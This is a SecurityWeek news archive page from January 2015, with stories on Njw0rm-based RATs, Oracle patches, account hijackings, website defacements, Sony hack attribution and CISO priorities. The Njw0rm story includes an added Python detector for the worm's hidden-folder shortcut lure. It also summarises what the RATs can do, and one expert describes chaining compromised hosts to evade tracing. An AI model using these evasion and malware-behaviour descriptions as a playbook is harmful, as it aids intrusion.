December 23, 2024

Njw0rm Source Code Used to Create New RATs

Posted on January 23, 2015 by in Security

Malware developers have used the source code of the remote access tool (RAT) Njw0rm to create two new RATs, researchers at Trend Micro reported on Thursday.

Njw0rm is a variant of njRAT, a tool believed to be developed by a Kuwait-based individual. In June 2014, Microsoft announced the results of an operation targeting njRAT (Bladabindi) and Njw0rm (Jenxcus). At the time, the company noted that cybercriminals could create their own versions of the malware because the necessary information and packages were available on public forums.

Trend Micro says the source code of Njw0rm was published on hacker forums in May 2013, after which cybercriminals started creating new pieces of malware based on the threat.

One of the new RATs is Kjw0rm. Version 2.0 of the malware was first spotted by the security firm in January 2014. Kjw0rm 0.5X and a new worm dubbed Sir DoOom emerged in December 2014.

njRAT evolution

The new pieces of malware come with an enhanced control panel and include several features not seen in Njw0rm. In addition to information on the victim’s IP address, location, operating system and USB devices, Kjw0rm’s control panel reports installed antivirus products (v2.0) and the presence of the .NET Framework (v0.5x). Sir DoOom additionally provides the botmaster with information on RAM, firewalls, antivirus products, CPU/GPU, and Windows product details (name, ID, key).

As far as functions are concerned, Njw0rm can execute commands and files, steal credentials, and receive updates from the attacker. The Kjw0rm RATs allow their master to shut down or restart the computer, open Web pages, and download and execute files and code.

Sir DoOom is even more interesting since it can be used to mine Bitcoin, launch DDoS attacks, control computers based on a timer, display messages, terminate antivirus processes, and open a website related to the Quran, the central religious text of Islam. This RAT is also designed to terminate itself if it detects that it is running inside a virtual machine.

Just like Njw0rm, the new threats are designed to propagate via removable devices. They hide some or all of the folders found on the infected device and create shortcut (.lnk) files, named after the hidden folders, that point to the malware, so that opening what looks like a folder runs the malware instead.
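As an added example, not code from the Trend Micro post or from SecurityWeek, the following Python check looks for that lure on a drive listing: a hidden directory shadowed by a same-named shortcut. The `Entry` type, the `find_lnk_decoys` and `scan_directory` helpers and the sample listing are all constructed for illustration; `scan_directory` is what you would point at a mounted USB stick, while the constructed listing lets the check run offline.

```python
"""Added example (not from the Trend Micro report or SecurityWeek): flag the
njw0rm-style removable-drive lure, i.e. a hidden folder next to a shortcut
(.lnk) that carries the folder's name. Names and the listing are constructed."""
import os
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class Entry:
    name: str
    is_dir: bool
    hidden: bool


def find_lnk_decoys(entries):
    """Return sorted (folder, shortcut) pairs where a hidden directory has a
    same-named .lnk file beside it. Matching is case-insensitive because
    FAT/NTFS volumes (the usual USB stick) are case-insensitive."""
    hidden_dirs = {e.name.lower(): e.name for e in entries if e.is_dir and e.hidden}
    decoys = []
    for e in entries:
        if e.is_dir or not e.name.lower().endswith(".lnk"):
            continue
        stem = e.name[:-4].lower()
        if stem in hidden_dirs:
            decoys.append((hidden_dirs[stem], e.name))
    return sorted(decoys)


def scan_directory(path):
    """Build Entry objects for a real directory (e.g. a mounted removable drive)."""
    entries = []
    with os.scandir(path) as it:
        for d in it:
            st = d.stat(follow_symlinks=False)
            # Windows exposes the hidden bit in st_file_attributes; on other
            # platforms fall back to the dot-file convention.
            attrs = getattr(st, "st_file_attributes", 0)
            hidden = bool(attrs & stat.FILE_ATTRIBUTE_HIDDEN) or d.name.startswith(".")
            entries.append(Entry(d.name, d.is_dir(follow_symlinks=False), hidden))
    return entries


# Constructed listing of an infected stick: two hidden folders each shadowed by
# a shortcut, one visible folder with a legitimate shortcut, the hidden dropper,
# and an unrelated file.
SAMPLE_LISTING = [
    Entry("Photos", True, True),
    Entry("Photos.lnk", False, False),
    Entry("Reports", True, True),
    Entry("reports.LNK", False, False),
    Entry("Backup", True, False),
    Entry("Backup.lnk", False, False),
    Entry("svchost.exe", False, True),
    Entry("Readme.txt", False, False),
]

if __name__ == "__main__":
    for folder, lnk in find_lnk_decoys(SAMPLE_LISTING):
        print(f"hidden folder {folder!r} shadowed by shortcut {lnk!r}")
```

A match is only a lead: inspect the shortcut's target (the hidden executable it launches) before treating the drive as infected, and do it from a host that does not auto-run shortcuts.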

“This evolution shows that the malware authors are becoming more active in developing new malware and using njw0rm as a template. Because of this pattern, we can expect to see more variants of this malware in the future,” Trend Micro threat response engineer Michael Marcos said in a blog post.

Subscribe to the SecurityWeek Email Briefing


Previous Columns by Eduard Kovacs:


SecurityWeek RSS Feed

Oracle Releases Massive Security Update

Posted on January 20, 2015 by in Security

Oracle has pushed out a massive number of patches in a security update, including critical fixes for Java SE and the Oracle Sun Systems Products Suite.

Overall, the update contains nearly 170 new security fixes, including 36 for Oracle Fusion Middleware. Twenty-eight of those 36 may be remotely exploitable without authentication, meaning they can potentially be exploited over a network without a username and password.

The most serious of the bugs, however, affect Java SE and the Fujitsu M10-1, M10-4 and M10-4S servers. In the case of Java SE, a CVSS Base Score of 10.0 was reported for four distinct client-only vulnerabilities (CVE-2014-6601, CVE-2015-0412, CVE-2014-6549 and CVE-2015-0408).

“Out of these [Java] 19 vulnerabilities, 15 affect client-only installations, 2 affect client and server installations, and 2 affect JSSE installations,” blogged Oracle Software Security Assurance Director Eric Maurice. “This relatively low historical number for Oracle Java SE fixes reflects the results of Oracle’s strategy for addressing security bugs affecting Java clients and improving security development practices in the Java development organization.”

In the case of the Oracle Sun Systems Products Suite, CVE-2013-4784 has a CVSS rating of 10.0 and affects XCP Firmware versions prior to XCP 2232. Overall, there are 29 security fixes for the suite.

The update also includes eight new security fixes for Oracle Database Server, none of which are remotely exploitable without authentication. Oracle MySQL has nine security fixes. There are also: 10 fixes for Oracle Enterprise Manager Grid Control; 10 for Oracle E-Business Suite; six for the Oracle Supply Chain Products Suite; seven security fixes for Oracle PeopleSoft products; 17 for Oracle Siebel CRM; one for Oracle JD Edwards Products; two for Oracle iLearning; two for Oracle Communications Applications; one for Oracle Retail Applications; one for Oracle Health Sciences Applications and 11 new security fixes for Oracle Virtualization. 

“The challenge with the Oracle CPU is, quarter after quarter, there is so much in these advisories,” said Ross Barrett, senior manager of security engineering at Rapid7. “There are so many different, unrelated platforms, that administrators risk missing something that might apply specifically to a very niche version of hardware that might be in their environment.”


Brian Prince is a Contributing Writer for SecurityWeek.

Previous Columns by Brian Prince:



Hackers Announce ‘World War III’ on Twitter

Posted on January 17, 2015 by in Security

Washington – Hackers took over the Twitter accounts of the New York Post and United Press International on Friday, writing bogus messages, including about hostilities breaking out between the United States and China.

One tweet posted under the UPI account quoted Pope Francis as saying, “World War III has begun.”

Another message delivered on the Post account said the USS George Washington, an aircraft carrier, was “engaged in active combat” against Chinese warships in the South China Sea.

The tweets were subsequently deleted.

A Post tweet later noted that “Our Twitter account was briefly hacked and we are investigating.”

The fake tweets were not just about war. One posted on UPI said “Just in: Bank of America CEO calls for calm: Savings accounts will not be affected by federal reserve decision.”

The Post is owned by Rupert Murdoch’s News Corp. Several media organizations have had their Twitter feeds hacked over the past two years including Agence France-Presse, the BBC and others.

A Pentagon official said the tweet about hostilities with China was “not true.”


© AFP 2013



Notepad++ Site Hacked in Response to “Je suis Charlie” Edition

Posted on January 15, 2015 by in Security

The official website of the popular source code editor Notepad++ was hacked and defaced on Monday by hacktivists protesting against the recently released “Je suis Charlie” edition of the application.

Hackers of the Fallaga Team, a Tunisian group, breached and defaced a large number of French websites following the Charlie Hebdo incident in which 12 people were killed by two masked gunmen.

The website of Notepad++ (notepad-plus-plus.org) became a target after the release of version 6.7.4, “Je suis Charlie” edition.

The attackers defaced the website with a message in which they accused Notepad++ developers of saying that “Islam is terrorist.”

In a statement published on Thursday, Don Ho, the France-based developer of Notepad++, clarified that the hackers have not compromised the binaries of the “Je suis Charlie” edition because they are stored on a different server.

“The message of the defacement accused Notepad++ of inciting hatred towards Islam and accusing Islam of supporting terrorism. The statements of Notepad++ ‘Je suis Charlie’ edition support nothing but the freedom of expression and only that. The fact of Notepad++ supporting the ‘Je suis Charlie’ movement has nothing to do with any accusation towards a specific community,” Ho explained.

“In fact the ‘Je suis Charlie’ movement in France, as far as I can tell, deserves no label of racism or of Islamophobia. I have many Muslim friends who are for ‘Je suis Charlie’. And sincerely, I don’t think that two extremist fools can stand for all Muslims or Islam itself,” he added.

The developer highlighted that those who don’t like the “Je suis Charlie” edition can simply use version 6.7.3, which contains the same features and bug fixes.

Hundreds of French websites have been defaced over the past few days. Islamist hackers started launching attacks after some members of the Anonymous hacktivist movement initiated an anti-jihadist campaign in response to the Charlie Hebdo shooting.

The Charlie Hebdo incident has given hacktivists a reason to deface websites, but it has also given cybercriminals the opportunity to lure unsuspecting users to their shady websites. Researchers at OpenDNS discovered a fake BBC News website earlier this week. The site was shut down before experts could determine its purpose, but it could have been used to serve malicious content, redirect users to other websites, or for click fraud purposes.


Previous Columns by Eduard Kovacs:



Pro-ISIS Hackers Compromise U.S. CENTCOM Twitter, YouTube Accounts

Posted on January 12, 2015 by in Security

CyberCaliphate

Hackers supporting Islamic State jihadists briefly took control of the Twitter and YouTube accounts of the U.S. Central Command (CENTCOM), the Department of Defense confirmed Monday.

In the attack, hackers replaced the main banner for CENTCOM’s Twitter account with an image of a masked fighter along with the words “CyberCaliphate” and “I love you ISIS”.

The attackers Tweeted and posted a message to Pastebin saying, “You’ll see no mercy infidels. ISIS is already here, we are in your PCs, in each military base. With Allah’s permission we are in CENTCOM now. We won’t stop! We know everything about you, your wives and children. U.S. soldiers! We’re watching you!” 

The attackers also posted what they presented as details on military personnel, including photos and a phone directory of officers, which some say is out of date and already publicly available.

“We can confirm that the US Central Command Twitter and YouTube accounts were compromised earlier today. We are taking appropriate measures to address the matter,” a Department of Defense representative said in a statement.


The @CENTCOM Twitter account was suspended at the time of publishing, but the Department of Defense said that it has regained control of the compromised accounts.

“The account compromised was timed with the release of a couple of sensitive documents on Pastebin, which appears to have been designed to intimidate US soldiers,” Trey Ford, Global Security Strategist at Rapid7, told SecurityWeek. “One thing to note: the Sony document dumps were laced with malware, and I expect these files may also be part of a targeted malware campaign targeting military analysts and their families.”

“This attack looks to be the same actors as the WBOC and Albuquerque Journal attacks last week,” Ian Amit, Vice President at ZeroFOX, said. “The verbiage is the same, the behavior is the same, the hashtags are the same — all indicators suggest this is the same group. The full extent of the damage: 3 Twitter accounts and 1 YouTube account.”

“Much of this appears to be simply scare tactics,” Amit added. “All of the ‘leaked’ documents are in fact public domain, repackaged to look like a real data breach. These actors are trying to make themselves look more legitimate by threatening soldiers’ wives and claiming to have mobile access. In truth, they likely only stole a password, either through a phishing scam or a brute-force attack.”

On Sunday, European, US and Canadian security ministers said that increased Internet surveillance and tighter border checks were “urgently” needed to combat jihadist attacks of the sort that shocked Paris last week. 

U.S. CENTCOM promotes cooperation among nations, responds to crises, and deters or defeats state and non-state aggression.

One of nine unified commands in the U.S. military, CENTCOM has an area of responsibility in the central area of the world consisting of 20 countries, including Afghanistan, Iran, Iraq, Jordan, Kazakhstan, Kuwait, Kyrgyzstan, Lebanon, Oman, Pakistan, Qatar, Saudi Arabia, Syria, Tajikistan, Turkmenistan, United Arab Emirates, Uzbekistan, and Yemen.

The attacks against CENTCOM came just as President Obama gave an address announcing a series of initiatives designed to enhance the nation’s cybersecurity and privacy environment.

Related: ISIS Cyber Ops: Empty Threat or Reality?

Related: Social Media a Key Element for Terror Groups


Managing Editor, SecurityWeek.

Previous Columns by Mike Lennon:



Feedback Friday: Is North Korea Behind the Sony Hack?

Posted on January 9, 2015 by in Security

In late November, Sony Pictures Entertainment was hacked by a group calling itself Guardians of Peace (GOP). What initially appeared to be another hacktivist attack later turned out to be a sophisticated operation, possibly orchestrated by a state actor.

Feedback Friday

The hackers’ activities came to light on November 24, when the computers of Sony employees started displaying an image of a skull accompanied by a warning message. In the following days, the hackers started leaking large amounts of information stolen from the entertainment giant’s networks. The leaked data included unreleased movies, private emails, the personal details of actors, financial and business information, and employee records (including medical information).

North Korea Cyber Attacks

North Korea was named a suspect after investigators found similarities between this attack and others believed to be carried out by Pyongyang. Shortly after, the hackers told Sony to erase all traces of The Interview, a comedy about a plot to assassinate North Korean leader Kim Jong-Un. Sony initially called off the release of the movie because of the hackers’ threats, but later decided to go ahead with the release on Christmas Day, as planned.

Sony has avoided pointing a finger at North Korea. United States authorities, on the other hand, say they’re certain North Korea is behind the attack, but they haven’t provided any proof to back their claims, except for the fact that the attackers used IP addresses “exclusively used by the North Koreans.”

North Korea has denied being responsible, but officials suggested it might be the work of supporters furious over The Interview. Last week, the US imposed new sanctions on North Korea in retaliation for the attack on Sony. On Wednesday, Director of National Intelligence James Clapper said that, during a secret mission to Pyongyang two months ago, he dined with the North Korean general who, according to Clapper, was responsible for overseeing the attack against Sony.

Everyone agrees that attribution is tricky. Some believe US authorities are jumping to conclusions, but others say the FBI surely has other evidence, which they might never share with the public, to back their claims.

This topic will be debated by a panel of experts and moderated by The Wall Street Journal’s Danny Yadron at the Suits and Spooks DC conference on February 4-5 at the Ritz-Carlton, Pentagon City.

And the Feedback Begins…

Jeffrey Carr, President/CEO, Taia Global, Inc:

“The evidence that the FBI believes it has against the DPRK in the Sony attack stems from the data that it received on the Dark Seoul attack last year from the private sector. The FBI, the NSA, and the private security companies upon which they rely for information believe that any attack linked to a North Korean IP address must be one that is government sanctioned since North Korea maintains such tight control over its Internet and Intranet. That is the FBI’s single point of failure because while that might have been true prior to 2009, it isn’t true any longer.


Access to those blocks is relatively easy if you go in through China, Thailand, Japan, Germany or other countries where North Korea has strategic connections.


It simply isn’t enough for the FBI director to say “We know who hacked Sony. It was the North Koreans” in a protected environment where no questions were permitted. The necessity of proof always lies with the person who lays the charges. As of today, the U.S. government is in the uniquely embarrassing position of being tricked by a hacker crew into charging another foreign government with a crime it didn’t commit. I predict that these hackers, and others, will escalate their attacks until the U.S. figures out what it’s doing wrong in incident attribution and fixes it.”

Joshua Cannell, malware intelligence analyst at Malwarebytes Labs:

“Many people continue to speculate about who was really behind the cyberattack against Sony Pictures. We know the director of the F.B.I. has made it publicly clear that North Korea was to blame, and the fact that he’s pushing to declassify that information should tell the world that they have solid evidence to back it up. If we weren’t living in a time where the ability to trust a U.S. Intelligence agency hadn’t recently been questioned during the release of incriminating N.S.A. documents, most people would have likely accepted the F.B.I.’s statement as fact long ago. It seems that by releasing more information, the F.B.I. is hoping to regain the confidence placed in U.S. Intelligence.


You have to look at some of the details leading up to the hack in November. North Korean officials called the release of The Interview ‘an act of terrorism,’ and there was a Facebook group sending threats to Sony Pictures months before the movie’s release. When that was shut down, actors continued to use other methods to communicate their threats, like e-mail. Finally, the threats came to fruition, and simply saying ‘it wasn’t us’ at this point doesn’t do much when all of the evidence points at them. There may have been others involved, that’s true, but that doesn’t change the conclusion of a lengthy federal investigation.”

Jay Kaplan, CEO of Synack:

“The security pundits that we’ve seen in the media disagreeing with the government’s assertion of North Korean attribution are ill-informed with conclusions that I believe to be fundamentally flawed. Even with the latest revelation of details tying North Korea to the Sony breach by “slipping up”, there is much more under the covers that the public is not seeing (and will never see as a result of classified sources.) Conclusions made by security firms after reviewing methodology, technical capability, and modus operandi are flawed given their non-complete picture of the situation at hand.


It is especially interesting to see how just a few months ago the world thought the government had too much information — the intelligence community was running rampant, too much data was being siphoned, and the integrity of our privacy was in question. Yet today, post-Sony breach, people are questioning the same government for coming to conclusions due to a lack of knowledge and perspective.”

Ken Westin, senior security analyst, Tripwire:

“It is difficult if not impossible for those of us in the private sector to verify the FBI’s findings without access to the information they have.


However, I think it is important to note that in this latest statement they are tying their attribution case to IP addresses they say were exclusively used by the North Koreans. I think it is important to point out that Comey said they were IP addresses exclusively used by the North Koreans and not IP addresses in North Korea. The IP addresses that were issued to the public in their flash advisories were IP addresses that have been seen before and used for spam and command and control by other criminal actors. This was a key reason many in the security community were skeptical of the findings, as based on the evidence provided there wasn’t exactly a smoking gun and the information was vague and inconclusive.


I would like to give the FBI the benefit of the doubt and assume that they have additional evidence aside from just IP addresses, which I think they must if they have the level of confidence that Comey is claiming. The difficult part of that for the security community is trusting the FBI. Trust does not come easily to this group, as by nature of their profession they are paranoid and skeptical and want to see the evidence for themselves to establish the facts.”


Marc Gaffan, CEO & Co-founder of Incapsula:

“While we may never know the motives behind the Sony Pictures attack, we’ve found that some attackers will publicly deny involvement, but leave breadcrumbs in an attempt to demonstrate prowess without taking the full brunt of public criticism. As for North Korea’s cyber espionage capabilities, despite the fact that their Internet capacity is less than half of the Falkland Islands, it would be foolhardy to equate a small Internet presence with a lack of skilled individuals working with or for their government.


Regardless of origin or motive, companies need to turn their focus to the blind spots in their organizations. Hackers will only continue to create more elusive and inventive ways to take down websites or steal information; our global networks see new methods every day. Sony Pictures learned their lesson, but will other companies? This remains to be seen.”

Michael Sutton, VP of Security Research, Zscaler:

“Attribution is hard. This is always the case when dealing with a cyber attack where IP addresses can be spoofed, proxies can be employed and digital weapons copied. Attribution is impossible when we don’t have all the facts. The FBI was surprisingly quick to finger the DPRK for the Sony attacks. Less than a month after the breach, the FBI confidently proclaimed that they had “enough information to conclude that the North Korean government is responsible for [the attacks]”.


Contrast that with the grand jury indictment of five Chinese Military officials charged last year with cyber espionage, a case which involved years of investigation. Why did the FBI move so quickly this time? Was it truly an open and shut case? Were there other political motivations for fingering North Korea? Without full transparency we’ll likely never know but we can presume that attribution was needed prior to retaliatory measures. Measures that have already publicly emerged in the form of US sanctions, but other more covert responses are no doubt also currently underway and unlikely to show up in the headlines.


Some have claimed that the DPRK did not have the means to conduct such a successful attack, but this is a country that has had an offensive cyber capability for many years and has shown a willingness to leverage it against foreign nations/companies. The Sony breach, while broad in terms of the damage caused, would not have required great sophistication if network admin credentials were indeed stolen and the target had poor internal controls to limit the reach of that individual’s network access. Given Sony’s poor history with previous attacks, including a 23 day DoS attack on the PlayStation Network in 2011, it’s not hard to fathom that internal security controls were lacking.”

Mike Tierney, COO at SpectorSoft:

“As the feeding frenzy around the possibility a nation was behind the Sony hack calms a bit, more and more credible experts are indicating that it is at least as likely that the hack and subsequent data dump were clearly designed to embarrass Sony. The fact that the tie between a pending movie release and the hack was originally made in news reports, and not by the hacker(s), lends some credence to the idea that there may be a more mundane, but all too common, perpetrator.


Very often, data leaks of this type stem from a disgruntled employee. Whether the source of their anger is specific, as in the case of a poor performance review or being passed over for a promotion, or more general, as in the case of rumored layoffs (which seem to be a possibility in the Sony case), disgruntled employees can and do present significant risk to organizations.”

Greg Martin, CTO at ThreatStream:

“The big issue with the Sony hack is that any “Security Expert” outside of the core investigation can claim an “alternate theory.”


This has been highly confusing to the public who have been hungry for more details which the FBI finally came out with. The FBI had clear evidence that they have some ‘smoking gun’ data showing the North Korean hackers were sloppy when setting up their social media accounts.


This is a common mistake made by many hackers – even the very sophisticated ones – and it’s one of the more common ways they get caught. My question to the ‘truthers’ is: why is that so hard to accept?”

Tal Klein, VP of Strategy, Adallom:

“The trouble with breach attribution is that smoking guns are hard to come by. A more concerning issue to those of us watching from the sidelines is that the initial attack vector has still not been discovered, and no breach containment announcement has been made thus far. That means we don’t know whether the attackers still have a foothold in Sony’s infrastructure or if there are more exfiltrated data dumps coming.


It is strange that the U.S. would rush to point fingers at North Korea, especially given that any recourse would doubtlessly punish the hapless DPRK proletariat more than government or military. Further, it seems obvious in hindsight that the FBI’s most recent revelations, as presented, would not quell detractors’ call for solid attributable evidence—so one wonders, ‘Why bother?’”

Lior Div, CEO and Co-founder of Cybereason, a MalOps protection company:

“When a company is attacked, it reduces the liability and blame of the attacked company if the public believes it is a nation state attack. This attack may have very well been done or aided by insiders, or other players, including North Koreans that are not nation state cyber attackers, but…certainly the legal and PR fallout for Sony will be less severe if it was believed the attack was state sponsored terrorism as opposed to a disgruntled insider.


From all that we’ve read so far, we haven’t seen significant hints for attribution to North Korea as a nation-state sponsored attack. The FBI stated that the attackers were negligent, leaving evidence that ties the attack to North Korea, but in my experience hackers with the capacity to exfiltrate the amount of data involved in the Sony attack are very far from being negligent. It is quite possible that any indicators pointing to North Korea were intentional, left or intentionally planted in order to mislead investigators.


So either the FBI knows things that were not shared with the media (possible) that clearly proves it in NK, or – somebody is leveraging it for his own political purposes. That includes the US government, Sony, the hackers…really, we may never know…”

Brendan Spikes, CEO, Spikes Security:

“Given the dangers of using the web today, is it not unreasonable to assume that any network can be breached by web malware trojans? This could surely include servers thought to be used exclusively by North Koreans. I wouldn’t be so quick to assume that someone intending to frame NK for the Sony attack could not intentionally leave breadcrumbs leading back to compromised NK servers.”

TaaSera CTO, Vice President and Founder, Srinivas Kumar:

“Attacker attribution requires reliable information to analyze how the breach was orchestrated internally, identifying the origin of the malicious code (supply chain), and finally tracking down the location of the attackers. The warrant required in a breach investigation to convict the cyber criminals must provide credible evidence as assurance that no evasion techniques were detected, including use of Tor networks, Fast flux DNS, and IP address spoofing. Further, for long duration and high volume data haul, determination of the corpus of actors by geo-location may be an authoritative assertion of the locality or distribution of the attackers.


Most investigations today that typically follow in the wake of high profile breaches rely on static geo-location markers for the network addresses and domain names linked to the security episode. The availability of cloud computing services, elastic IPs, Tor networks coupled with the dynamic domain name services, domain name and IP address fast flux warrant evidence beyond reasonable doubt to determine true actors (perpetrators).”

TK Keanini, CTO at Lancope:

“While attribution can be difficult in the physical world, it is incredibly tricky in the digital world. Not only are there effective tools to remain anonymous but there are equally as many tools to make it look like it is attributed to a certain source when it is actually another.


Conflict in simpler times was very symmetrical in that it was the red team versus the blue team, but these days in the digital realm of the Internet, it is almost never that simple. An orange team can make it look like the red team is to blame for the attack on the blue team, and from there it can grow even more complex. This asymmetrical pattern is the new pattern of cyber conflict and the sooner we all recognize it the better.


Ultimately there is an information layer that is adjacent to the physical world, meaning at some point you do get back to a person or set of people who are behind the attacks. The synthesis and analysis that lead up to this is complex and not well understood by everyone. Those that understand the dynamics of information spaces are slow and cautious to point fingers, as we have seen in the controversy around attribution of the Sony Pictures attacks. Even when the culprit stands up and makes themselves known as the Guardians of Peace (GOP), law enforcement still struggles to tie it all back to the physical world where laws can be enforced.”

Ian Amit, Vice President of ZeroFOX:

“Attribution is always a dangerous game. Attackers leave plenty of red herrings to cover their footsteps and make following their trail next to impossible. This is exactly the case with Sony – a few lines of code or IP addresses indicate North Korea, making for a great story, but the actual attack could have come from anywhere.


In short, attribution is not a technology game, and trying to deduce attribution based on technical indicators is inherently flawed. If a hacker has deep access in the system, it is extremely easy to change the evidence in order to throw off the trail. What you find from a forensic perspective can mean a thousand different things all at once, based on little fragments of code here or there or the geographic location where an attack was routed through. All these red herrings mean is that attribution becomes political very quickly: any party can conduct their own analysis and come to a conclusion that suits their purposes, all supported by some pieces of incomplete technical evidence.”

Jason Lewis, Chief Collection and Intelligence Officer of Lookingglass Cyber Solutions:

“Attribution is an extremely complex challenge that requires the support of all forms of intelligence to include network, signals, physical, human, etc. In this case, let’s assume the attacker is highly skilled. A highly skilled attacker would understand that leaving false evidence would confuse investigators and lead them to conclusions that point away from themselves.


I view this scenario based on how I would compromise a target. First, I would be sure to have multiple launch points between my clandestine Internet connection and my target. That means I would chain multiple compromised hosts through a series of VPNs that encrypt all my traffic. If an investigator was able to trace from the target to my last launch point, they would only find evidence of my tunnel termination. All of my traffic would be passing through the host, never leaving a trace of my activity. If I was determined to frame a person or entity for my activity, I would certainly attempt to compromise a host on their network that was used by many other users, a proxy for example. My malicious traffic would be lost in the noise of thousands of other users.


Tracing activity back to me through my tunneled infrastructure may not be impossible, but it would be extremely difficult given that I’m focused on not being caught. If I accessed this network on multiple occasions, I would change the compromised hosts I used for my tunnels and never use the same combination twice. Every comment referencing attribution in the SONY attack introduces more questions.”

Don’t miss the upcoming panel “Sony and the DPRK: A Question of Attribution” at Suits and Spooks DC moderated by The Wall Street Journal’s Danny Yadron.

Until Next Friday…Have a Great Weekend!


Previous Columns by Eduard Kovacs:


What CISOs, InfoSec Pros Have on Their 2015 Wish Lists

Posted on January 7, 2015 by in Security

CISO Wish List for 2015

Security experts weigh in on what they would like to see in 2015 to make their jobs wrangling users, infrastructure, and data easier.

The new year ahead is a good time to reflect on what infosec professionals need to keep users and data safe—before the inevitable race to stay ahead of the crises and firefighting begins in earnest. In previous years, SecurityWeek asked experts to talk about their security resolutions. This year, security experts weigh in on their 2015 wish list—things they would like to see happen in their organization and the security industry as a whole.

Information security is a tough job. There is an element of fortune telling to figure out where the next threats will come from, as well as continuous gate keeping to monitor everything that comes in and out of the organization.

Intent and motives matter, since the same action can be malicious, negligent, or benign based on the circumstances. Locking things down annoys users, so there have to be controls in place that let users do what they want while still maintaining a certain level of protection. When something goes wrong, such as a failed compliance audit, regulatory investigation, data breach, cyber-attack, or data theft, there is always finger pointing and recrimination.

Faced with these challenges, what do CSOs/CISOs, information security practitioners, and other experts wish for? The gamut of responses ranged from the serious (implementing new controls) to humorous (a time machine). At the heart of all the responses was the recognition that security is visible and their jobs are on the line when things go wrong.

“If I was a practicing CISO right now, the very first thing on my wish list would be a ‘keep me from getting fired’ gift card,” said Eric Cowperthwaite, vice-president of advanced security and strategy at Core Security and the former CISO of Provident Health and Services. The card would be something CISOs can hand to the CEO after the inevitable attack, breach and theft of critical assets and say, “can’t fire me this time,” he said.

CISOs should demand access to the CEO and the support of the senior executives in the company to define and protect the crown jewels, said Renee Guttmann, vice president of information risk management and member of the Accuvant Office of the CISO. Most CISOs want more attention and funding from the executive team—and a seat at the executive table to provide updates periodically, said Guttmann, who formerly served as CISO at Coca-Cola. CISOs also want to be recognized as playing as critical a role within the organization as the CFO or COO.

CISO Board Access

“In 2015, CISOs will be asking for a corner office, with a view,” said Michael Daly, the CTO of Cybersecurity & Special Missions at Raytheon.

Talking to a Board Which ‘Gets’ Security

Most CISOs would love to switch the conversation with the board of directors from the whys of security to the hows. Even after the past year of almost non-stop breaches, it’s clear that the need to proactively implement good security is poorly understood—or simply ignored—at the highest levels of business, said Geoff Webb, senior director of solution strategy at NetIQ.

“If I could give every CISO on the planet a New Year’s wish, it would be to have that conversation changed from ‘Why should I invest in security’ to ‘How do we get the job done,’” said Webb.

CISOs want the support of their executive management to put in place the level of security consistent with the amount of risk the organization is willing to accept, said Marc Maiffret, CTO of BeyondTrust.


Having the Industry Step Up

Several of the experts expressed their frustration on the state of the information security industry. “It’s clear that after Target, JPMC, Sony and many other highly publicized, massive attacks perpetuated in 2014, the industry needs new tools to find these attackers before they are able to successfully complete their damage,” said Mike Mumcuoglu, CTO and co-founder of LightCyber.

For years, CISOs have been promised that more effective security technology was on the way, and that they just needed to spend “just a little bit more” to significantly improve their security. “It hasn’t quite worked out the way it’s been promised,” said Ken Levine, CEO of Digital Guardian. CISOs should be asking for technology that works better than what’s been delivered to date, for a price that reflects its actual value, he said. And that doesn’t mean yet another piece of technology blasting out millions of alerts, since it’s not possible to process them all.

“Memo to the security industry, giving me hundreds of thousands, if not millions of alerts is about as effective as giving me none,” Levine said. “Will you please tell me which alerts I need to worry most about!”

There is a lot of conversation about security analytics, but it’s still just a lot of promises and not enough reality. “This is all vendor hype as none of the technologies integrate enough of the products in my environment to make the data useful without me having to put asterisks next to the data in my presentations,” said Mike Davis, CTO of CounterTack.

It would be nice to have security reports that show the state of the organization that “don’t put people to sleep,” said Gil Zimmermann, CEO and co-founder of CloudLock.

It’s not just technology that needs to change—the way the industry treats standards also needs to change, so that standards are actually treated as something that works across platforms and organizations. “Too many standards that aren’t interoperable between products prevent me from deploying different tools,” Davis said.

Along with standards, the industry needs to define security and risk metrics for making informed decisions and managing a security program. Other C-level executives have a set of metrics they can use to explain what they are doing and what the effects on the business are. At the moment, there is no consensus on key performance indicators or a widely adopted set of quantifiable metrics, so cyber-security decisions are “perceived as mere guess work by boards of directors and other corporate executives,” said Jonathan Trull, CISO of Qualys and former CISO of Colorado. The lack of trust in CSOs and the security community as a whole is a major barrier to obtaining additional funding and resources.

“CISOs must be able to answer the question: For x amount of money spent on cyber security, what will be the return?” Trull said.

Cool Tools That Need to Exist

Along with asking for better security technology to make the day-to-day operations as well as overall risk management possible, security professionals have their own list of products that would make their jobs easier—and more fun.

Zimmermann said a “one-year paid membership to tech gadgets of the month club” would be a good thing for a CISO to have.

“A time machine so I can go back in time and make a bunch of different investment choices,” said Core Security’s Cowperthwaite.

“’X-Ray Data Goggles’ to give me a deep look into the network to determine where my critical or sensitive data is, what assets support the data, and what controls keep the data safe,” said Arlie Hartman, a consultant at Rook Security.

“’Information Security Pocket Translator’ to refine my message to the board, to speak their language, and enable the business to work within acceptable risks,” said Randy Wray, a consultant with Rook Security.

Having Necessary Tools on Hand

CISOs want to be able to proactively track specific adversaries as they “walk” their way through the network, said Rick Howard, CSO of Palo Alto Networks. By identifying indicators of compromise as part of an attack, CISOs will be able to determine their response. “In my perfect fantasy world, I would like to be able to track adversaries — criminals, spies, hacktivists, and ankle biters — by watching for sets of Indicators of Compromise at every link in the Kill Chain,” he said.

CISOs need the attacker profile, not the actual identity. If the attacker is a spy out to steal mergers and acquisitions documents, and those documents are on the organization’s network, then the internal security team should be on high alert. Otherwise, the team can deal with the threat without turning this into an emergency firefighting situation, he said.

Failing that perfect scenario, CSOs and CISOs should at least have their technology configured correctly—oftentimes organizations discover too late that the settings they thought they were getting were never enabled when the technology was first deployed. “We spend gazillions of dollars to buy the latest and greatest, and yet fail to squeeze as much efficiency out of it as possible,” said Howard. While it may be more interesting to talk about nation-state attacks, CSOs need to focus on device configuration. “We should at least get that right before we move on to the sexy stuff.”

Target has set a very public precedent for financial liability in the case of a targeted attack on personal financial information. As a result, every major financial, retail, and online entity will be looking into cyber-insurance, said Mike Mumcuoglu, CTO and co-founder of LightCyber. Cost-effective data breach insurance will be on many CISO wish lists this year, he said.

Effective Collaboration With Others

Security is much more visible in that people are more aware and pay attention when something goes wrong, but it’s not yet viewed as a joint effort. There is still the sense that users do their own thing while the security folks in the backroom keep things humming. There needs to be formal agreements between business, IT, and security teams to integrate information security into the process instead of treating it as an add-on commodity, said Chris Blow, a consultant with Rook Security.

